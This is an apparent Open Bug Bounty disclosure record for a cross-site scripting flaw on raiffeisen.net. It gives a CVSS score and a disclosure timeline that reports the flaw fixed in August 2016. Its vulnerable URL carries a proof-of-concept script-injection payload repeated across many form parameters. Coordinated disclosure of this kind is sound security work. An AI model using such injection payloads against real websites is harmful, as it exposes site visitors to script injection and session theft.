raiffeisen.net XSS vulnerability

2016-08-22T12:56:00
ID OBB:177036
Type openbugbounty
Reporter Anonymous
Modified 2016-09-21T12:56:00

Description

Open Bug Bounty ID: OBB-177036

Description| Value
---|---
Affected Website:| raiffeisen.net
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.raiffeisen.net/de/haushalte/alles-fuers-heimnetz/hardware/hausautomation/?id=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[lastname]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[email]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[submitField]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[removeFileField]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[removeFile]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[privacy]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[requesttype]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[randomID]=xss%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E&formhandler;[step-2-next]=xss%27%3E%20%3C/
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 August, 2016 12:56 GMT
Vulnerability Verified:| 22 August, 2016 12:59 GMT
Website Operator Notified:| 22 August, 2016 12:59 GMT
Vulnerability Published:| 22 August, 2016 12:59 GMT[without any technical details]
Vulnerability Fixed:| 24 August, 2016 11:29 GMT
Public Disclosure:| 21 September, 2016 12:56 GMT